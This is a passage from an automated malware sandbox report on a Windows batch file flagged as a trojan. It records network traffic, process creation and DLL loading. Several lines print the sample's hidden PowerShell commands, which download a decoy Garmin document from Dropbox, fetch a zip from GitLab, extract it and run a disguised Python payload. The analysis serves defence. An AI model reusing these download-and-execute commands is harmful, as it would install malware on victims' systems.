                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.8:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.8:49705 version: TLS 1.2
                  Source: classification engineClassification label: mal88.troj.evad.winBAT@30/16@3/2
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3344:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sml4d1bp.3hn.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" "
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
